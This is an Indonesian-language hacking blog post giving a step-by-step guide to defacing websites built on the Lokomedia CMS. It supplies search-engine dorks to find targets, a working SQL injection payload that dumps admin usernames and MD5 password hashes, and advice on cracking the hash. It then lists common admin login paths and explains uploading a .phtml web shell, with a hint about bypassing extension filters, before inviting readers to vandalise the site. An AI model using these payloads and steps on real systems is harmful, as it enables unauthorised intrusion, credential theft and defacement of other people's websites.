Tutor Deface Website

Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs,
pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah
yg ada pada CMS Lokomedia nih, kite suntik2an dlu,
*jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja,
kali aja masih crotz
Langsung aje Tutorial SQL Injection on Lokomedia CMS

Dork : - inurl:kategori-23-hiburan.html
       - inurl:hal-tentang-kami.html
       - inurl:statis-1-pengantar.html
       - inurl:statis-19-beasiswa.html
       - inurl:statis-22-kerjasama.html
(kembangin lagi gunakan otak bokepers Lu,
biar dpt yg Vuln and Verawan gengs ;*)

eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

1. Dorking menggunakan Search Engine

2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html

Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian ctrl+u untuk melihatnya lebih jelas.

Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 ,
karena password masih dalam bentuk MD5 maka harus di decrypt,
saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalian bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.

Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form.

Untuk mengupload shell bisa dibagian Download

Untuk mengakses shell biasanya di target.c0li/files/namashellLu
*Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3

Done, silahkan masuk ke shell lu:D
Silahkan Acak" Webnya:v

Terimakasih.